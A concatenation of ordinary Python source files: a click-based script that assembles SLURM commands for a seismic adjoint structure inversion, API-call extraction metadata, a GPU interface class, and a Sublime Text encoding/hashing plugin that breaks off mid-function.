@click.option('--partition', required=True, type=str, help="the partion name, eg: skx-normal")
@click.option('--time_forward', required=True, type=str, help="the time used in step 1")
@click.option('--account', required=True, type=str, help="the stampede2 account")
@click.option('--periods', required=True, type=str, help="periods in filtering: minp1,maxp1/minp2,maxp2/...")
@click.option('--waveform_length', required=True, type=int, help="the length of the waveform to cut")
@click.option('--sampling_rate', required=True, type=int, help="the sampling rate to use")
@click.option('--taper_tmin_tmaxs', required=True, type=str, help="the taper time bands: minp1,maxp1/minp2,maxp2/...")
def main(base_directory, cmts_directory, ref_directory, windows_directory, data_asdf_directory, data_info_directory, last_step_model_update_directory,
stations_path, sem_utils_directory, source_mask_directory,
n_total, n_each, n_iter, nproc, n_node, partition, time_forward, account,
periods, waveform_length, sampling_rate, taper_tmin_tmaxs):
"""
perform the structure inversion for the second iteration and later.
"""
time = time_forward
# * we have to build the structure to perform the structure inversion.
build_inversion_structure(base_directory, cmts_directory, ref_directory)
# * ======================================================================================================================
# * here we have to init the slurm script, no need to load modules here
result = "date; \n"
pyexec = sys.executable
current_path = str(sh.pwd())[:-1] # pylint: disable=not-callable
# * change the flags to -F
result += change_simulation_type(pyexec,
join(base_directory, 'simulation'), "forward_save")
# * submit the forward simulation job
forward_simulation_command = forward_task(base=join(base_directory, "simulation"),
N_total=n_total, N_each=n_each, N_iter=n_iter, nproc=nproc, run_mesh=True)
result += forward_simulation_command
result += f"cd {current_path}; \n"
# * collect the sync from the forward simulation
result += collect_sync_files(
pyexec, join(base_directory, 'output'), join(base_directory, 'raw_sync'))
# * process the sync
n_cores_each_event = nproc*n_each//n_total
# ! note here mvapich2 may have the problem of "time out". No better solution, try to use 24 cores here.
if(n_cores_each_event > 24):
n_cores_each_event = 24
result += process_sync(pyexec, n_total, join(base_directory,
"raw_sync"), join(base_directory, "processed_sync"), periods, waveform_length, sampling_rate, taper_tmin_tmaxs)
result += f"cd {current_path}; \n"
# * calculate the misfit windows
body_periods, surface_periods = periods.split("/")
body_periods_splitter = body_periods.split(",")
surface_periods_splitter = surface_periods.split(",")
min_periods = f"{body_periods_splitter[0]},{surface_periods_splitter[0]}"
max_periods = f"{body_periods_splitter[1]},{surface_periods_splitter[1]}"
result += calculate_misfit_windows(pyexec, n_total,
windows_directory, join(
base_directory, "misfit_windows"), min_periods, max_periods,
data_asdf_directory, join(base_directory, "processed_sync"), data_info_directory)
# * calculate the adjoint source, and ln it to the sem directory
result += calculate_adjoint_source(pyexec, n_total,
join(base_directory, "misfit_windows"), stations_path, join(
base_directory, "raw_sync"),
join(
base_directory, "processed_sync"), data_asdf_directory,
join(base_directory, "adjoint_source"), body_periods, surface_periods)
result += ln_adjoint_source_to_structure(pyexec,
join(base_directory, "adjoint_source"), join(base_directory, "simulation"))
# * generate STATIONS_ADJOINT and cp it to the simulation directory
result += calculate_stations_adjoint(pyexec, stations_path,
join(base_directory, "misfit_windows"), join(base_directory, "stations_adjoint"))
result += cp_stations_adjoint2structure(pyexec,
join(base_directory, "stations_adjoint"), join(base_directory, "simulation"))
# * change the simulation type to the type 3
result += change_simulation_type(pyexec,
join(base_directory, 'simulation'), "structure")
# * do the adjoint simulation
adjoint_simulation_command = forward_task(base=join(base_directory, "simulation"),
N_total=n_total, N_each=n_each, N_iter=n_iter, nproc=nproc, run_mesh=False)
result += adjoint_simulation_command
result += f"cd {current_path}; \n"
# * construct the processing kernel directory
kernel_process_directory = join(base_directory, "process_kernel")
input_model_directory = join(ref_directory, "DATA", "GLL")
construct_process_kernel_structure(
join(base_directory,
"database"), ref_directory, sem_utils_directory, kernel_process_directory,
input_model_directory, last_step_model_update=last_step_model_update_directory)
# * replace the source mask
result += replace_source_mask(pyexec, join(base_directory,
'simulation'), source_mask_directory)
# * do the summation
result += do_preconditioned_summation(kernel_process_directory)
# * here we submit the first job
submit_job("psf_test", result, n_node, n_each *
nproc, partition, time, account, "stampede2")
def build_inversion_structure(base_directory, cmts_directory, ref_directory):
"""
build_inversion_structure: build the structure to contain all the essencial directories used in the inversion and the simulation directory.
"""
sh.mkdir("-p", base_directory)
# * copy cmts_directory
sh.cp("-r", cmts_directory, join(base_directory, "cmts"))
# * init the simulation directory
output_path = join(base_directory, "output")
sh.mkdir("-p", output_path)
database_path = join(base_directory, "database")
sh.mkdir("-p", database_path)
simulation_path = join(base_directory, "simulation")
sh.mkdir("-p", simulation_path)
run_script = Build_structure(
base=simulation_path, cmtfiles=join(base_directory, "cmts"), ref=ref_directory,
output=output_path, database=database_path)
run_script.run()
# * make the directory for the sync of the forward simulation
sh.mkdir("-p", join(base_directory, "raw_sync"))
sh.mkdir("-p", join(base_directory, "processed_sync"))
# * mkdir for misfit windows
sh.mkdir("-p", join(base_directory, "misfit_windows"))
# * mkdir for adjoint source
sh.mkdir("-p", join(base_directory, "adjoint_source"))
sh.mkdir("-p", join(base_directory, "stations_adjoint"))
# * mkdir for kernel processing
sh.mkdir("-p", join(base_directory, "process_kernel"))
# * mkdir to collect the perturbed sync
sh.mkdir("-p", join(base_directory, "perturbed_sync"))
sh.mkdir("-p", join(base_directory, "processed_perturbed_sync"))
def calculate_adjoint_source(py, nproc, misfit_windows_directory, stations_path, raw_sync_directory, sync_directory,
data_directory, output_directory, body_band, surface_band):
"""
Calculatet the adjoint source for the structure inversion.
"""
script = f"ibrun -n {nproc} {py} -m seisflow.scripts.structure_inversion.mpi_calculate_adjoint_source_zerolagcc_multiple_events --misfit_windows_directory {misfit_windows_directory} --stations_path {stations_path} --raw_sync_directory {raw_sync_directory} --sync_directory {sync_directory} --data_directory {data_directory} --output_directory {output_directory} --body_band {body_band} --surface_band {surface_band}; \n"
return script
def replace_gll_link(py, simulation_directory, new_gll_directory):
"""
replace all gll links.
"""
script = f"{py} -m seisflow.scripts.structure_inversion.replace_gll_link --simulation_directory {simulation_directory} --new_gll_directory {new_gll_directory}; \n"
return script
def replace_source_mask(py, base_directory, source_mask_directory):
"""
replace source masks.
"""
script = f"{py} -m seisflow.scripts.structure_inversion.replace_source_mask --base_directory {base_directory} --source_mask_directory {source_mask_directory}; \n"
return script
def process_sync(py, nproc, sync_directory, output_directory, periods, waveform_length, sampling_rate, taper_tmin_tmaxs):
"""
process the sync.
"""
script = f"ibrun -n {nproc} {py} -m seisflow.scripts.asdf.mpi_process_sync_series --sync_directory {sync_directory} --output_directory {output_directory} --periods {periods} --waveform_length {waveform_length} --sampling_rate {sampling_rate} --taper_tmin_tmaxs {taper_tmin_tmaxs}; \n"
return script
if __name__ == "__main__":
main() # pylint: disable=no-value-for-parameter
|
[
"click.option",
"sh.pwd",
"click.command",
"sh.mkdir",
"os.path.join"
] |
[((1065, 1080), 'click.command', 'click.command', ([], {}), '()\n', (1078, 1080), False, 'import click\n'), ((1082, 1181), 'click.option', 'click.option', (['"""--base_directory"""'], {'required': '(True)', 'type': 'str', 'help': '"""the base inversion directory"""'}), "('--base_directory', required=True, type=str, help=\n 'the base inversion directory')\n", (1094, 1181), False, 'import click\n'), ((1178, 1267), 'click.option', 'click.option', (['"""--cmts_directory"""'], {'required': '(True)', 'type': 'str', 'help': '"""the cmts directory"""'}), "('--cmts_directory', required=True, type=str, help=\n 'the cmts directory')\n", (1190, 1267), False, 'import click\n'), ((1264, 1365), 'click.option', 'click.option', (['"""--ref_directory"""'], {'required': '(True)', 'type': 'str', 'help': '"""the reference specfem directory"""'}), "('--ref_directory', required=True, type=str, help=\n 'the reference specfem directory')\n", (1276, 1365), False, 'import click\n'), ((1362, 1457), 'click.option', 'click.option', (['"""--windows_directory"""'], {'required': '(True)', 'type': 'str', 'help': '"""the windows directory"""'}), "('--windows_directory', required=True, type=str, help=\n 'the windows directory')\n", (1374, 1457), False, 'import click\n'), ((1454, 1558), 'click.option', 'click.option', (['"""--data_asdf_directory"""'], {'required': '(True)', 'type': 'str', 'help': '"""the processed data directory"""'}), "('--data_asdf_directory', required=True, type=str, help=\n 'the processed data directory')\n", (1466, 1558), False, 'import click\n'), ((1555, 1654), 'click.option', 'click.option', (['"""--data_info_directory"""'], {'required': '(True)', 'type': 'str', 'help': '"""the data info directory"""'}), "('--data_info_directory', required=True, type=str, help=\n 'the data info directory')\n", (1567, 1654), False, 'import click\n'), ((1651, 1778), 'click.option', 'click.option', (['"""--last_step_model_update_directory"""'], {'required': '(True)', 'type': 'str', 'help': '"""the last step smoothed kernel directory"""'}), "('--last_step_model_update_directory', required=True, type=str,\n help='the last step smoothed kernel directory')\n", (1663, 1778), False, 'import click\n'), ((1776, 1863), 'click.option', 'click.option', (['"""--stations_path"""'], {'required': '(True)', 'type': 'str', 'help': '"""the stations path"""'}), "('--stations_path', required=True, type=str, help=\n 'the stations path')\n", (1788, 1863), False, 'import click\n'), ((1860, 1959), 'click.option', 'click.option', (['"""--sem_utils_directory"""'], {'required': '(True)', 'type': 'str', 'help': '"""the sem_utils directory"""'}), "('--sem_utils_directory', required=True, type=str, help=\n 'the sem_utils directory')\n", (1872, 1959), False, 'import click\n'), ((1956, 2072), 'click.option', 'click.option', (['"""--source_mask_directory"""'], {'required': '(False)', 'default': '""""""', 'type': 'str', 'help': '"""the source mask directory"""'}), "('--source_mask_directory', required=False, default='', type=\n str, help='the source mask directory')\n", (1968, 2072), False, 'import click\n'), ((2069, 2159), 'click.option', 'click.option', (['"""--n_total"""'], {'required': '(True)', 'type': 'int', 'help': '"""the total number of events"""'}), "('--n_total', required=True, type=int, help=\n 'the total number of events')\n", (2081, 2159), False, 'import click\n'), ((2156, 2260), 'click.option', 'click.option', (['"""--n_each"""'], {'required': '(True)', 'type': 'int', 'help': '"""number of events to run in each iteration"""'}), "('--n_each', required=True, type=int, help=\n 'number of events to run in each iteration')\n", (2168, 2260), False, 'import click\n'), ((2257, 2351), 'click.option', 'click.option', (['"""--n_iter"""'], {'required': '(True)', 'type': 'int', 'help': '"""the number of iterations to run"""'}), "('--n_iter', required=True, type=int, help=\n 'the number of iterations to run')\n", (2269, 2351), False, 'import click\n'), ((2348, 2453), 'click.option', 'click.option', (['"""--nproc"""'], {'required': '(True)', 'type': 'int', 'help': '"""the number of processes used for each event"""'}), "('--nproc', required=True, type=int, help=\n 'the number of processes used for each event')\n", (2360, 2453), False, 'import click\n'), ((2450, 2551), 'click.option', 'click.option', (['"""--n_node"""'], {'required': '(True)', 'type': 'int', 'help': '"""the number of nodes used in simulation"""'}), "('--n_node', required=True, type=int, help=\n 'the number of nodes used in simulation')\n", (2462, 2551), False, 'import click\n'), ((2548, 2646), 'click.option', 'click.option', (['"""--partition"""'], {'required': '(True)', 'type': 'str', 'help': '"""the partion name, eg: skx-normal"""'}), "('--partition', required=True, type=str, help=\n 'the partion name, eg: skx-normal')\n", (2560, 2646), False, 'import click\n'), ((2643, 2735), 'click.option', 'click.option', (['"""--time_forward"""'], {'required': '(True)', 'type': 'str', 'help': '"""the time used in step 1"""'}), "('--time_forward', required=True, type=str, help=\n 'the time used in step 1')\n", (2655, 2735), False, 'import click\n'), ((2732, 2817), 'click.option', 'click.option', (['"""--account"""'], {'required': '(True)', 'type': 'str', 'help': '"""the stampede2 account"""'}), "('--account', required=True, type=str, help='the stampede2 account'\n )\n", (2744, 2817), False, 'import click\n'), ((2814, 2927), 'click.option', 'click.option', (['"""--periods"""'], {'required': '(True)', 'type': 'str', 'help': '"""periods in filtering: minp1,maxp1/minp2,maxp2/..."""'}), "('--periods', required=True, type=str, help=\n 'periods in filtering: minp1,maxp1/minp2,maxp2/...')\n", (2826, 2927), False, 'import click\n'), ((2924, 3029), 'click.option', 'click.option', (['"""--waveform_length"""'], {'required': '(True)', 'type': 'int', 'help': '"""the length of the waveform to cut"""'}), "('--waveform_length', required=True, type=int, help=\n 'the length of the waveform to cut')\n", (2936, 3029), False, 'import click\n'), ((3026, 3120), 'click.option', 'click.option', (['"""--sampling_rate"""'], {'required': '(True)', 'type': 'int', 'help': '"""the sampling rate to use"""'}), "('--sampling_rate', required=True, type=int, help=\n 'the sampling rate to use')\n", (3038, 3120), False, 'import click\n'), ((3117, 3239), 'click.option', 'click.option', (['"""--taper_tmin_tmaxs"""'], {'required': '(True)', 'type': 'str', 'help': '"""the taper time bands: minp1,maxp1/minp2,maxp2/..."""'}), "('--taper_tmin_tmaxs', required=True, type=str, help=\n 'the taper time bands: minp1,maxp1/minp2,maxp2/...')\n", (3129, 3239), False, 'import click\n'), ((7816, 7854), 'os.path.join', 'join', (['base_directory', '"""process_kernel"""'], {}), "(base_directory, 'process_kernel')\n", (7820, 7854), False, 'from os.path import join\n'), ((7883, 7917), 'os.path.join', 'join', (['ref_directory', '"""DATA"""', '"""GLL"""'], {}), "(ref_directory, 'DATA', 'GLL')\n", (7887, 7917), False, 'from os.path import join\n'), ((8830, 8860), 'sh.mkdir', 'sh.mkdir', (['"""-p"""', 'base_directory'], {}), "('-p', base_directory)\n", (8838, 8860), False, 'import sh\n'), ((9007, 9037), 'os.path.join', 'join', (['base_directory', '"""output"""'], {}), "(base_directory, 'output')\n", (9011, 9037), False, 'from os.path import join\n'), ((9042, 9069), 'sh.mkdir', 'sh.mkdir', (['"""-p"""', 'output_path'], {}), "('-p', output_path)\n", (9050, 9069), False, 'import sh\n'), ((9090, 9122), 'os.path.join', 'join', (['base_directory', '"""database"""'], {}), "(base_directory, 'database')\n", (9094, 9122), False, 'from os.path import join\n'), ((9127, 9156), 'sh.mkdir', 'sh.mkdir', (['"""-p"""', 'database_path'], {}), "('-p', database_path)\n", (9135, 9156), False, 'import sh\n'), ((9179, 9213), 'os.path.join', 'join', (['base_directory', '"""simulation"""'], {}), "(base_directory, 'simulation')\n", (9183, 9213), False, 'from os.path import join\n'), ((9218, 9249), 'sh.mkdir', 'sh.mkdir', (['"""-p"""', 'simulation_path'], {}), "('-p', simulation_path)\n", (9226, 9249), False, 'import sh\n'), ((4308, 4342), 'os.path.join', 'join', (['base_directory', '"""simulation"""'], {}), "(base_directory, 'simulation')\n", (4312, 4342), False, 'from os.path import join\n'), ((4793, 4823), 'os.path.join', 'join', (['base_directory', '"""output"""'], {}), "(base_directory, 'output')\n", (4797, 4823), False, 'from os.path import join\n'), ((4825, 4857), 'os.path.join', 'join', (['base_directory', '"""raw_sync"""'], {}), "(base_directory, 'raw_sync')\n", (4829, 4857), False, 'from os.path import join\n'), ((5150, 5182), 'os.path.join', 'join', (['base_directory', '"""raw_sync"""'], {}), "(base_directory, 'raw_sync')\n", (5154, 5182), False, 'from os.path import join\n'), ((5233, 5271), 'os.path.join', 'join', (['base_directory', '"""processed_sync"""'], {}), "(base_directory, 'processed_sync')\n", (5237, 5271), False, 'from os.path import join\n'), ((5843, 5881), 'os.path.join', 'join', (['base_directory', '"""misfit_windows"""'], {}), "(base_directory, 'misfit_windows')\n", (5847, 5881), False, 'from os.path import join\n'), ((6013, 6051), 'os.path.join', 'join', (['base_directory', '"""processed_sync"""'], {}), "(base_directory, 'processed_sync')\n", (6017, 6051), False, 'from os.path import join\n'), ((6238, 6276), 'os.path.join', 'join', (['base_directory', '"""misfit_windows"""'], {}), "(base_directory, 'misfit_windows')\n", (6242, 6276), False, 'from os.path import join\n'), ((6293, 6325), 'os.path.join', 'join', (['base_directory', '"""raw_sync"""'], {}), "(base_directory, 'raw_sync')\n", (6297, 6325), False, 'from os.path import join\n'), ((6410, 6448), 'os.path.join', 'join', (['base_directory', '"""processed_sync"""'], {}), "(base_directory, 'processed_sync')\n", (6414, 6448), False, 'from os.path import join\n'), ((6554, 6592), 'os.path.join', 'join', (['base_directory', '"""adjoint_source"""'], {}), "(base_directory, 'adjoint_source')\n", (6558, 6592), False, 'from os.path import join\n'), ((6723, 6761), 'os.path.join', 'join', (['base_directory', '"""adjoint_source"""'], {}), "(base_directory, 'adjoint_source')\n", (6727, 6761), False, 'from os.path import join\n'), ((6763, 6797), 'os.path.join', 'join', (['base_directory', '"""simulation"""'], {}), "(base_directory, 'simulation')\n", (6767, 6797), False, 'from os.path import join\n'), ((6976, 7014), 'os.path.join', 'join', (['base_directory', '"""misfit_windows"""'], {}), "(base_directory, 'misfit_windows')\n", (6980, 7014), False, 'from os.path import join\n'), ((7016, 7056), 'os.path.join', 'join', (['base_directory', '"""stations_adjoint"""'], {}), "(base_directory, 'stations_adjoint')\n", (7020, 7056), False, 'from os.path import join\n'), ((7154, 7194), 'os.path.join', 'join', (['base_directory', '"""stations_adjoint"""'], {}), "(base_directory, 'stations_adjoint')\n", (7158, 7194), False, 'from os.path import join\n'), ((7196, 7230), 'os.path.join', 'join', (['base_directory', '"""simulation"""'], {}), "(base_directory, 'simulation')\n", (7200, 7230), False, 'from os.path import join\n'), ((7363, 7397), 'os.path.join', 'join', (['base_directory', '"""simulation"""'], {}), "(base_directory, 'simulation')\n", (7367, 7397), False, 'from os.path import join\n'), ((7966, 7998), 'os.path.join', 'join', (['base_directory', '"""database"""'], {}), "(base_directory, 'database')\n", (7970, 7998), False, 'from os.path import join\n'), ((8237, 8271), 'os.path.join', 'join', (['base_directory', '"""simulation"""'], {}), "(base_directory, 'simulation')\n", (8241, 8271), False, 'from os.path import join\n'), ((8921, 8949), 'os.path.join', 'join', (['base_directory', '"""cmts"""'], {}), "(base_directory, 'cmts')\n", (8925, 8949), False, 'from os.path import join\n'), ((9530, 9562), 'os.path.join', 'join', (['base_directory', '"""raw_sync"""'], {}), "(base_directory, 'raw_sync')\n", (9534, 9562), False, 'from os.path import join\n'), ((9583, 9621), 'os.path.join', 'join', (['base_directory', '"""processed_sync"""'], {}), "(base_directory, 'processed_sync')\n", (9587, 9621), False, 'from os.path import join\n'), ((9675, 9713), 'os.path.join', 'join', (['base_directory', '"""misfit_windows"""'], {}), "(base_directory, 'misfit_windows')\n", (9679, 9713), False, 'from os.path import join\n'), ((9767, 9805), 'os.path.join', 'join', (['base_directory', '"""adjoint_source"""'], {}), "(base_directory, 'adjoint_source')\n", (9771, 9805), False, 'from os.path import join\n'), ((9826, 9866), 'os.path.join', 'join', (['base_directory', '"""stations_adjoint"""'], {}), "(base_directory, 'stations_adjoint')\n", (9830, 9866), False, 'from os.path import join\n'), ((9923, 9961), 'os.path.join', 'join', (['base_directory', '"""process_kernel"""'], {}), "(base_directory, 'process_kernel')\n", (9927, 9961), False, 'from os.path import join\n'), ((10026, 10064), 'os.path.join', 'join', (['base_directory', '"""perturbed_sync"""'], {}), "(base_directory, 'perturbed_sync')\n", (10030, 10064), False, 'from os.path import join\n'), ((10085, 10133), 'os.path.join', 'join', (['base_directory', '"""processed_perturbed_sync"""'], {}), "(base_directory, 'processed_perturbed_sync')\n", (10089, 10133), False, 'from os.path import join\n'), ((4148, 4156), 'sh.pwd', 'sh.pwd', ([], {}), '()\n', (4154, 4156), False, 'import sh\n'), ((4453, 4487), 'os.path.join', 'join', (['base_directory', '"""simulation"""'], {}), "(base_directory, 'simulation')\n", (4457, 4487), False, 'from os.path import join\n'), ((7497, 7531), 'os.path.join', 'join', (['base_directory', '"""simulation"""'], {}), "(base_directory, 'simulation')\n", (7501, 7531), False, 'from os.path import join\n'), ((9323, 9351), 'os.path.join', 'join', (['base_directory', '"""cmts"""'], {}), "(base_directory, 'cmts')\n", (9327, 9351), False, 'from os.path import join\n')]
|
# from __future__ import annotations
from abc import ABCMeta, abstractmethod
from typing import List, TypeVar, Dict
from ..Peripheral_interface import Peripherical_interface
class Gpu_interface(Peripherical_interface, metaclass=ABCMeta):
_vendor: str
_model: str
@property
def vendor(self) -> str:
return self._vendor
@vendor.setter
def vendor(self, value: str):
self._vendor = value
@property
def model(self) -> str:
return self._model
@model.setter
@abstractmethod
def model(self, value: str):
raise NotImplementedError
@property
def temp(self) -> float:
try:
self._temp = self.get_temp()
except NotImplementedError as e:
try:
raise e
finally:
e = None
del e
else:
return self._temp
@temp.setter
def temp(self, value: float):
self._temp = value
def __init__(self, os, vendor, model):
super().__init__(os)
self.vendor = vendor
self.model = model
@abstractmethod
def get_temp(self) -> float:
raise NotImplementedError
GpuType = TypeVar("GpuType", bound="Gpu_interface")
def get_gpuid(gpu_ids: Dict[str, str], gpus: List[GpuType]):
vendors = []
for i in range(len(gpus)):
if gpus[i].vendor not in vendors:
vendors.append(gpus[i].vendor)
gpuvendor = "".join(vendors).lower()
if gpuvendor in gpu_ids:
return gpu_ids[gpuvendor]
else:
print("Unknown GPU, contact us on github to resolve this.")
return "unknown"
|
[
"typing.TypeVar"
] |
[((1206, 1247), 'typing.TypeVar', 'TypeVar', (['"""GpuType"""'], {'bound': '"""Gpu_interface"""'}), "('GpuType', bound='Gpu_interface')\n", (1213, 1247), False, 'from typing import List, TypeVar, Dict\n')]
|
# -*- coding: utf-8 -*-
import base64
import hashlib
import sublime, sublime_plugin
import sys
PYTHON = sys.version_info[0]
if 3 == PYTHON:
# Python 3 and ST3
from urllib import parse
from . import codec_base62
from . import codec_base64
from . import codec_xml
from . import codec_json
from . import codec_quopri
from . import codec_hex
from . import codec_idn
else:
# Python 2 and ST2
import urllib
import codec_base62
import codec_base64
import codec_xml
import codec_json
import codec_quopri
import codec_hex
import codec_idn
SETTINGS_FILE = "Codec.sublime-settings"
"""
Pick up all the selections which are not empty.
If no selection, make all the text in return selection.
"""
def selected_regions(view):
sels = [sel for sel in view.sel() if not sel.empty()]
if not sels:
sels = [sublime.Region(0, view.size())]
else:
sels = view.sel()
return sels
"""
Sublime Text 3 Base64 Codec
Assumes UTF-8 encoding
ๆฅๆฌ่ช encodes to base64 as 5pel5pys6Kqe
subjects?abcd encodes to url safe base64 as c3ViamVjdHM_YWJjZA==
>>> view.run_command('base64_encode', {'encode_type': 'b64encode'})
"""
class Base64EncodeCommand(sublime_plugin.TextCommand):
ENCODE_TYPE = {
'b64decode': codec_base64.b64decode,
'urlsafe_b64decode': base64.urlsafe_b64decode,
}
def run(self, edit, encode_type='b64encode'):
fix_base32_padding = sublime.load_settings(SETTINGS_FILE).get("base32_fix_padding", False)
print("Codec: fix base32 padding? %s" % str(fix_base32_padding))
fix_base64_padding = sublime.load_settings(SETTINGS_FILE).get("base64_fix_padding", False)
print("Codec: fix base64 padding? %s" % str(fix_base64_padding))
for region in selected_regions(self.view):
if not region.empty():
original_string = self.view.substr(region)
# print("string: " + original_string)
if 'b64encode' == encode_type:
encoded_string = base64.b64encode(original_string.encode("UTF-8"))
elif 'b64decode' == encode_type:
encoded_string = codec_base64.b64decode(original_string.encode("UTF-8"), add_padding=fix_base64_padding)
elif 'urlsafe_b64encode' == encode_type:
encoded_string = base64.urlsafe_b64encode(original_string.encode("UTF-8"))
elif 'urlsafe_b64decode' == encode_type:
encoded_string = codec_base64.urlsafe_b64decode(original_string.encode("UTF-8"), add_padding=fix_base64_padding)
elif 'b32encode' == encode_type:
encoded_string = base64.b32encode(original_string.encode("UTF-8"))
elif 'b32decode' == encode_type:
encoded_string = codec_base64.b32decode(original_string.encode("UTF-8"), add_padding=fix_base32_padding)
elif 'b16encode' == encode_type:
encoded_string = base64.b16encode(original_string.encode("UTF-8"))
elif 'b16decode' == encode_type:
encoded_string = base64.b16decode(original_string.encode("UTF-8"))
else:
print("unsupported operation %s" % (encode_type,))
break
# print("string encoded: " + str(encoded_string.decode("UTF-8")))
self.view.replace(edit, region, encoded_string.decode("UTF-8"))
"""
Sublime Text 3 URL Encoding (Percentage Encoding) Codec
ๆฅๆฌ่ช encodes to %E6%97%A5%E6%9C%AC%E8%AA%9E
"something with a space" encodes to "something%20with%20a%20space"
>>> view.run_command('url_encode', {'encode_type': 'quote'})
"""
class UrlEncodeCommand(sublime_plugin.TextCommand):
if 2 == PYTHON:
ENCODE_TYPE = {
'quote': urllib.quote,
'unquote': urllib.unquote,
'quote_plus': urllib.quote_plus,
'unquote_plus': urllib.unquote_plus
}
else:
ENCODE_TYPE = {
'quote': parse.quote,
'unquote': parse.unquote,
'quote_plus': parse.quote_plus,
'unquote_plus': parse.unquote_plus
}
def run(self, edit, encode_type='quote'):
safe_characters = str(sublime.load_settings(SETTINGS_FILE).get("url_encoding_safe", "/"))
print("Codec: safe url characters? %s" % str(safe_characters))
urlencode_method = UrlEncodeCommand.ENCODE_TYPE[encode_type]
# print("using url encode method: " + str(urlencode_method))
for region in selected_regions(self.view):
if not region.empty():
original_string = self.view.substr(region)
# print("string: " + original_string.encode("UTF-8"))
# print("string encoded: " + encoded_string)
if 2 == PYTHON:
try:
encoded_string = urlencode_method(original_string.encode("UTF-8"), safe=safe_characters)
except TypeError:
# FIXME - time to separate quote and unquote to avoid this kind of errors.
encoded_string = urlencode_method(original_string.encode("UTF-8"))
self.view.replace(edit, region, encoded_string.decode("UTF-8"))
else:
try:
encoded_string = urlencode_method(original_string, safe=safe_characters)
except TypeError:
# FIXME - time to separate quote and unquote to avoid this kind of errors.
encoded_string = urlencode_method(original_string)
self.view.replace(edit, region, encoded_string)
"""
Sublime Text 3 Secure Hash Codec
ๆฅๆฌ่ช hashes to SHA-256 as 77710aedc74ecfa33685e33a6c7df5cc83004da1bdcef7fb280f5c2b2e97e0a5
>>> view.run_command('secure_hash', {'secure_hash_type': 'sha256'})
"""
class SecureHashCommand(sublime_plugin.TextCommand):
SECURE_HASH_TYPE = {
'md5': 'md5',
'sha1': 'sha1',
'sha224': 'sha224',
'sha256': 'sha256',
'sha384': 'sha384',
'sha512': 'sha512'
}
def run(self, edit, secure_hash_type='sha256'):
secure_hash_type = SecureHashCommand.SECURE_HASH_TYPE[secure_hash_type]
# print("using secure hash algorithm: " + secure_hash_type)
for region in selected_regions(self.view):
if not region.empty():
original_string = self.view.substr(region)
# print("string: " + original_string)
hash_obj = hashlib.new(secure_hash_type)
hash_obj.update(original_string.encode("UTF-8"))
encoded_string = hash_obj.hexdigest()
# print("string encoded: " + str(encoded_string))
self.view.replace(edit, region, str(encoded_string))
"""
Sublime Text 3 Secure Hash Codec
doSomething(); hashes to SHA-256 as RFWPLDbv2BY+rCkDzsE+0fr8ylGr2R2faWMhq4lfEQc=
>>> view.run_command('binary_secure_hash', {'secure_hash_type': 'sha256'})
"""
class BinarySecureHashCommand(sublime_plugin.TextCommand):
SECURE_HASH_TYPE = {
'sha256': 'sha256',
'sha384': 'sha384',
'sha512': 'sha512'
}
def run(self, edit, secure_hash_type='sha256'):
secure_hash_type = SecureHashCommand.SECURE_HASH_TYPE[secure_hash_type]
# print("using secure hash algorithm: " + secure_hash_type)
for region in selected_regions(self.view):
if not region.empty():
original_string = self.view.substr(region)
# print("string: " + original_string)
hash_obj = hashlib.new(secure_hash_type)
hash_obj.update(original_string.encode("UTF-8"))
encoded_string = base64.b64encode(hash_obj.digest()).decode('UTF-8')
# print("string encoded: " + str(encoded_string))
self.view.replace(edit, region, str(encoded_string))
"""
Escapes and unescapes the 5 standard XML predefined entities
<hello>T'was a dark & "stormy" night</hello>
escapes to
<hello>T'was a dark & "stormy" night</hello>
>>> view.run_command('xml', {'encode_type': 'escape'})
"""
class XmlCommand(sublime_plugin.TextCommand):
def run(self, edit, encode_type='escape'):
method = self.get_method(encode_type)
for region in selected_regions(self.view):
if not region.empty():
original_string = self.view.substr(region)
new_string = method(original_string)
self.view.replace(edit, region, new_string)
def get_method(self, encode_type):
if 'escape' == encode_type:
return codec_xml.escape
elif 'unescape' == encode_type:
return codec_xml.unescape
else:
raise NotImplementedError("unknown encoding type %s" % (str(encode_type),))
"""
Encodes and decodes Quoted-Printable strings
This is a really long line to test whether "quoted-printable" works correctly when using ๆฅๆฌ่ช and ่ฑ่ช
encodes to
This is a really long line to test whether "quoted-printable" works correct=
ly when using =E6=97=A5=E6=9C=AC=E8=AA=9E and =E8=8B=B1=E8=AA=9E
>>> view.run_command('quoted_printable', {'encode_type': 'encode'})
"""
class QuotedPrintableCommand(sublime_plugin.TextCommand):
def run(self, edit, encode_type='encode'):
method = self.get_method(encode_type)
for region in selected_regions(self.view):
if not region.empty():
original_string = self.view.substr(region)
encoded_string = method(original_string.encode("UTF-8"))
self.view.replace(edit, region, encoded_string.decode("UTF-8"))
def get_method(self, encode_type):
if 'encode' == encode_type:
return codec_quopri.encodestring
elif 'decode' == encode_type:
return codec_quopri.decodestring
else:
raise NotImplementedError("unknown encoding type %s" % (str(encode_type),))
"""
Encodes and decodes JSON
T'was a dark & "stormy" night in ๆฅๆฌ
encodes to
"T'was a dark & \"stormy\" night in ๆฅๆฌ"
>>> view.run_command('json', {'encode_type': 'encode'})
"""
class JsonCommand(sublime_plugin.TextCommand):
def run(self, edit, encode_type='encode'):
method = self.get_method(encode_type)
for region in selected_regions(self.view):
if not region.empty():
original_string = self.view.substr(region)
new_string = method(original_string)
self.view.replace(edit, region, new_string)
def get_method(self, encode_type):
if 'encode' == encode_type:
return codec_json.encode
elif 'encode_ensure_ascii' == encode_type:
return codec_json.encode_ensure_ascii
elif 'decode' == encode_type:
return codec_json.decode
else:
raise NotImplementedError("unknown encoding type %s" % (str(encode_type),))
"""
Encodes and decodes C-style hex representations of bytes
Hello, my good friend
encodes to
\\x48\\x65\\x6c\\x6c\\x6f\\x2c\\x20\\x6d\\x79\\x20\\x67\\x6f\\x6f\\x64\\x20\\x66\\x72\\x69\\x65\\x6e\\x64\\x21
>>> view.run_command('c_hex', {'encode_type': 'encode'})
"""
class HexCommand(sublime_plugin.TextCommand):
def run(self, edit, encode_type='encode'):
method = self.get_method(encode_type)
for region in selected_regions(self.view):
if not region.empty():
original_string = self.view.substr(region)
new_string = method(original_string)
self.view.replace(edit, region, new_string)
def get_method(self, encode_type):
if 'encode' == encode_type:
return codec_hex.encode_hex
elif 'decode' == encode_type:
return codec_hex.decode_hex
else:
raise NotImplementedError("unknown encoding type %s" % (str(encode_type),))
class IdnCommand(sublime_plugin.TextCommand):
def run(self, edit, encode_type='punycode_encode'):
method = self.get_method(encode_type)
for region in selected_regions(self.view):
if not region.empty():
original_string = self.view.substr(region)
new_string = method(original_string)
